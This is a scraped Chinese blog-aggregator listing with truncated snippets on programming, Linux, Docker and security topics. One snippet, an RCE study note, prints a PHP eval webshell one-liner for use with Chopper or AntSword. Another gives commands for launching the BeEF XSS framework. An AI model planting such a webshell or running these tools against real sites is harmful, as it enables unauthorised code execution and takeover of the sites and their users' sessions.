漏洞 基础json web

02 linux 基础(2)

## shell 基本维护命令 ### 获取联机帮助 使用 `man` 命令可以找到特定的联机帮助页,并提供简短的命令说明。一般语法格式为: ![image](https://b3logfile.com/file/2023/07/siyuan/1661686246031/assets/image-2 ......
基础 linux 02

AI训练营—Python的一些基础知识

[toc] #列表 切片:左开右闭 ![](https://img2023.cnblogs.com/blog/2238249/202307/2238249-20230725154936276-403651531.png) 倒取值 ![](https://img2023.cnblogs.com/blo ......
训练营 基础知识 基础 知识 Python

springMVC Mybatis ssm整合 post请求json 响应json数据配置

1、pom.xml <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>2.0.32</version> </dependency> 2、springmvc-config.xml ......
json springMVC Mybatis 数据 post

Asp.Net 使用Log4Net (基础版)

# Asp.Net 使用Log4Net (基础版) ## 1. 创建项目 创建ASP.NET Web Forms项目 在Visual Studio中创建一个新的ASP.NET Web Forms项目。命名为"Log4NetDemo"。 ## 2.安装Log4Net包 打开NuGet包管理器控制台,并 ......
Net Log4Net 基础 4Net Log4

rce漏洞学习

rce漏洞:利用代码或者命令去执行 常见的一句话木马: 1、普通一句话: 1 2 3 <?php @eval($_POST[123456]); ?> *post后面中括号里面的内容是使用菜刀或蚁剑连接时的密码 2、防爆破一句话: 1 2 3 4 <?php substr(md5($_REQUEST[ ......
漏洞 rce

xpath丶BeautifulSoup丶pyquery丶jsonpath 解析html与json串

XPath与jsonpath 1 import json 2 from jsonpath import jsonpath 3 4 def json_test(): 5 str1 = '{"name":"埃里克森"}' 6 # 将字符串转为Python dict对象 7 js_obj = json.l ......
BeautifulSoup jsonpath pyquery xpath html

左神算法-基础06-前缀树&贪心算法

# 左神算法-基础06-前缀树&贪心算法 ## 介绍前缀树 何为前缀树? 如何生成前缀树? > 例子: > > 一个字符串类型的数组arr1,另一个字符串类型的数组arr2。 > > arr2中有哪些字符,是arr1中出现的?请打印。 > > arr2中有哪些字符,是作为arr1中某个字符串前缀出现 ......
前缀 算法 基础 amp 06

C#-INI文件基础操作类

首先添加引用: using System.Runtime.InteropServices; 声明外部实现方法: [DllImport("kernel32")] private static extern long WritePrivateProfileString(string section, s ......
文件 基础 INI

(转载)修复 K8s SSL/TLS 漏洞(CVE-2016-2183)指南

(转载)修复 K8s SSL/TLS 漏洞(CVE-2016-2183)指南 前言 测试服务器配置 主机名IPCPU内存系统盘数据盘用途 zdeops-master 192.168.9.9 2 4 40 200 Ansible 运维控制节点 ks-k8s-master-0 192.168.9.91 ......
漏洞 指南 2016 2183 K8s

【计算机网络基础】

IOS 7模型(开放系统互联模型) 1:物理层 (信号转换):通过网卡将其他信号转换成计算机识别信号-数字信号(二进制 0/1); 可以是电信号、光纤(光信号)、电磁波。 2:数据链路层(识别目标):MAC(物理)地址(网卡唯一地址,需要入网许可证,可供查询厂商等信息)- 设备之间通信唯一目标。 3 ......
网络基础 计算机 基础 网络

学习生理基础 | 记忆的四个环节2——保持 | 2023年7月25日

小虾米原创作品,转载请注明出处:https://www.cnblogs.com/shrimp-can/p/17580595.html 我们都想高效学习,但如何实现呢?网络上充斥着各种记忆、学习的技巧,能给予我们很大的帮助。 但我始终认为,要做好一件事,须得“顺势而为”。那对于学习,什么是这个“势”呢 ......
生理 环节 记忆 基础 2023

帆软channel反序列化漏洞

## 一级 - 测试 ## 一级级 - 测试 - 测试 ### 二级 - 测试 - 测试 #### 三级 - 测试 ## 二级 - 测试 ......
序列 漏洞 channel

MySQL 基础知识

## 基础知识 默认端口:3306 数据库连接格式: #### 基础语法: ~~~sql -- CRUD -- 添加数据 insert into [表名] ([字段], [字段], ...) values ([值], [值], ...); -- 删除数据 delete from [表名] where ......
基础知识 基础 知识 MySQL

Smartbi 身份认证绕过漏洞

因为自己搭建的环境存在一些问题,可能是版本过高的原因,(奇奇怪怪的问题,用户没有权限),所以目前仅仅做概念性验证,对漏洞的原理进行分析。 ......
身份认证 漏洞 身份 Smartbi

web前端 静态资源路径问题

问题:对于一个简单的form表单,url究竟应该如何填写? 1、url的各部分组成 对于地址:http://192.168.1.1:8080/hello/index.html其中:分解为三部分 服务器地址: http://192.168.1.1:8080 WEB应用上下文: /hello 网页或请求 ......
前端 静态 路径 问题 资源

Java 基础 - 泛型机制详解

著作权归@pdai所有 原文链接:https://pdai.tech/md/java/basic/java-basic-x-generic.html Java泛型这个特性是从JDK 1.5才开始加入的,因此为了兼容之前的版本,Java泛型的实现采取了“伪泛型”的策略,即Java在语法上支持泛型,但是 ......
机制 基础 Java

Web 3.0 会是互联网的下一个时代吗?

2000 年初,只读互联网 Web 1.0 被 Web 2.0 所取代。在 Web 2.0 时代,用户摆脱了只读的困扰,可以在平台上进行互动并创作内容。而 Web 3.0 的到来,除了加密货币和区块链等相关名词让大家耳熟能详外,并没有让广大互联网用户真正意义上地感知到。那么到底什么是 Web 3.0 ......
互联网 时代 Web 3.0

WEB漏洞—逻辑越权之水平垂直越权

逻辑越权简介 1.水平越权 通过更换的某个 ID 之类的身份标识,从而使 A 账号获取(修改、删除等)B/C/D账号数据(权限相同)。 2.垂直越权 使用低权限身份的账号,发送高权限账号才能有的请求,获得其高权限的操作。 3.未授权访问 通过删除请求中的认证信息后重放该请求,依旧可以访问或者完成操作 ......
漏洞 逻辑 水平 WEB

【1.0】基础串联

# 【一】解释型语言和编译型语言 > - C语言: > - C语言的代码可以在不同平台上进行编译,因为C是一种面向过程的编程语言,没有对特定平台的依赖。 > - 为了在不同平台上进行编译,需要使用相应平台的编译器来将C代码编译为可执行文件。 > - 跨平台运行指的是通过编写平台无关的代码,使得代码可 ......
基础 1.0

json序列化空的时候显示出来

@JsonInclude(JsonInclude.Include.ALWAYS) 期望转换后的json字符串应该为: {"id":1200,"name":null,"createDate":15622858066864} 实际转换的json为: {"id":1200,"createDate":156 ......
序列 时候 json

Docker 基础介绍

Docker Docker是时下热门的容器技术,Docker是os层虚拟化架构(虚拟出来的操作系统和宿主机操作系统共享一个内核)的一种体现产品。 容器化技术(我们可以把tomcat,redis,nginx……安装docker容器中),可以方便对软件的环境(开发环境/测试环境/生产环境……)进行搬运, ......
基础 Docker

kali用beef实现xss漏洞攻击测试

一、Kali开启网络监听: service apache2 start 二、启动 Kali beef-xss 模块: beef-xss 如果需要查看密码路径root权限,可以用以下指令: vi /etc/beef-xss/config.yaml 其它指令,如下: apt-get remove bee ......
漏洞 kali beef xss

web系统字典统一中文翻译问题

几乎每个web系统都离不开各种状态码。订单新建,待支付,未支付,已支付,待发货。 消息已读未读,任务待标记待审批已审批待流转已完成未完成。等等。 复杂一点的,会有多级状态码。 状态码超出3个的,一般都会纳入统一的字典管理。字典系统作为一个独立的微服务部署。 使用Redis作为缓存。其它系统使用字典的 ......
字典 问题 系统 web

纯手撸 Django web框架批量删除redis的key

纯手撸 Django web框架批量删除redis的key 环境 环境参照上一章节博客部署环境,在此基础上进行功能加强【批量删除指定前缀的key】,然后再CI里面掉这个接口地址即可清理redis缓存的key,更加高效的运维工作 修改视图 ## mysite/myweb1/views.py # Cre ......
框架 Django redis web key

一、计算机基础-前置知识

1.python是一门编程语言 什么是编程语言?什么是语言?为什么要有编程语言? 编程语言的本质就是一门语言 语言就是一种事物和另一种事物沟通的一种表达方式/工具 人 人类的语言 >奴隶 人 编程语言 >计算机 什么是编程? 为什么要编程 编程就是人把自己想计算机做的事,也就是自己的思维逻辑,用编程 ......
计算机 基础 知识

【漏洞修复通知】修复 Apache Shiro 认证绕过漏洞,漏洞编号:CVE-2023-34478,漏洞危害等级:高危

> 2023 年 7 月 24 日,Apache Shiro 发布更新版本,修复了一个身份验证绕过漏洞,漏洞编号:CVE-2023-34478,漏洞危害等级:高危。 Apache Shiro 版本 1.12.0 之前和 2.0.0-alpha-3 之前容易受到路径遍历攻击,当与基于非规范化请求路由请 ......
漏洞 等级 Apache 34478 Shiro

02-docker基础概念

1.docker ps-a: 显示运行后的容器,使用-a则显示全部,不使用-a只显示成功运行 2.docker rmi 镜像名/镜像ID:删除镜像文件 3.docker stop 容器名/容器ID:停止正在运行的容器 4.docker rm容器名/容器ID:删除停止的容器 5.docker logs ......
概念 基础 docker 02

00-docker虚拟化技术基础

# 1.虚拟化技术的概念 - 虚拟化技术主要是将物理的资源转变为逻辑上可以管理的资源,以打破物理资源结构之间的壁垒,让计算的元件运行在虚拟的基础上,而不是直接运行在物理的资源上。 - 虚拟化技术的底层是要进行虚拟的硬件设备物理机资源,通过虚拟化技术软件可以将物理机虚拟生成N台虚拟机,应用程序、软件服 ......
基础 docker 技术 00

python入门教程(非常详细),从零基础入门到精通,看完这一篇就够了

python入门教程(非常详细),从零基础入门到精通,看完这一篇就够了 本文罗列了了python零基础入门到精通的详细教程,内容均以知识目录的形式展开。 01.python由来与发展介绍 02.项目开发流程 第一章 markdown编辑器 01.markdown基本语法 02.Typora简介与安装 ......
入门教程 基础 教程 python